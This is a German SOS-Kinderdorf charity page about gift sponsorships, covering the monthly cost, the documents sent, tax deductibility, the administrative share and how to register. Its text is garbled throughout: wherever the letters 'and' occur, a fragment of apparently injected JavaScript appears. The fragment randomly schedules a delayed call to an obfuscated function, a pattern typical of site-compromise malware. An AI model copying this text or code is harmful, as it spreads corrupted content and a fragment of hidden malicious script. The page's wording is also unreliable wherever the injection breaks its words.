Die SOS-Geschenkpatenschaft

Eine SOS-Geschenkpatenschaft hilft nicht nur einem SOS-Kind

Ein Geschenk das hilft

Mit einer SOS-Geschenkpatenschaft helfen Sie nicht nur einem SOS-Kind oder SOS-Kinderdorf, sondern machen gleichzeitig einem Ihrer Verwandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andten, Freunde oder Geschäftspartner eine große Freude. Wenn Sie eine Patenschaft verschenken, übernehmen Sie die Patenbeiträge. Mit Ihrem Beitrag sorgen Sie unter andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}anderem für das Essen, die Kleidung, die Schulausbildung und die medizinische Versorgung Ihres Patenkindes. Der Beschenkte wird regelmäßig über die Entwicklung des Patenkindes informiert.

Was kostet eine SOS-Geschenkpatenschaft?

Ihr monatlicher Beitrag beträgt 31 Euro (für Kind- oder Dorfpatenschaft). Damit nehmen Sie ein Schicksal in die Handom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}and und sichern die Zukunft eines Kindes.

Patenkind im SOS-Kindergarten

Welche Unterlagen bekommen ich und der Beschenkte bei einer SOS-Geschenkpatenschaft?

  • Nach der Anmeldung über unser Online-Formular können Sie sich direkt eine Geschenk-Urkunde ausdrucken. Diese können Sie direkt an den Beschenkten weitergeben.
  • Etwa zehn Tage nach der Anmeldung bekommen Sie dann die Patenunterlagen per Post, die Sie anschließend an den Beschenkten weiterreichen. Die Unterlagen enthalten unter andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}anderem Angaben und Fotos vom Patenkind oder SOS-Kinderdorf und dem jeweiligen Landom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}and. Außerdem legen wir das Patenhandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andbuch als Nachschlagewerk für die häufigsten Fragen bei.
  • Im weiteren Verlauf der SOS-Patenschaft informieren wir den Beschenkten regelmäßig postalisch in Text und Bild über die Entwicklung seines Patenkindes bzw. über das Leben im SOS-Kinderdorf.
  • Außerdem erhält der Beschenkte vierteljährlich unsere kostenlose SOS-Zeitung.
  • Ihnen als Schenker senden wir nach Jahresabschluss automatisch eine Zuwendungsbestätigung (Anfang Februar). Denn die Paten-Beiträge sind steuerlich absetzbar. Sie können die Geschenkpatenschaft jederzeit und ohne Angabe von Gründen beenden.

Sichern Sie einem Kind eine ZukunftIhre Unterstützung kommt an!

Ihr Patenschaftsbeitrag ist zweckgebunden. Damit unterstützen Sie im Namen des Beschenkten ein SOS-Kind und sein Zuhause, bzw. das jeweilige SOS-Kinderdorf sowie dessen Zusatzeinrichtungen (etwa SOS-Schulen und SOS-Ausbildungszentren). Wir bemühen uns erfolgreich um angemessene Werbe- und Verwaltungskosten. Im Bereich der Patenschaften behalten wir für die organisatorische Abwicklung zehn Prozent als Pauschale von den Patenbeiträgen ein.

Wie melde ich mich an?

Sie können sich über unser sicheres Online-Formular oder telefonisch unter 0800 50 30 500 anmelden. Bei Ihrer Anmeldung können Sie unter andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}anderem den Kontinent auswählen, in dem Sie ein Kind unterstützen möchten. Auch andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andere Wünsche, wie etwa das Alter des Patenkindes, versuchen wir gerne zu berücksichtigen.

Sie haben noch Fragen?

Wir haben hier die häufigsten Fragen und Antworten zur Patenschaft für Sie zusammengestellt. Wenn Sie zudem weitere Informationen benötigen, können Sie gratis Informationen per Post anfordern. Gerne helfen wir Ihnen bei Fragen zur Patenschaft auch persönlich weiter. Rufen Sie uns kostenfrei an oder schreiben Sie uns.

Nehmen Sie ein Schicksal in die Handom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}and:

Werden Sie SOS-Pate!

Werden Sie SOS-Dorfpate!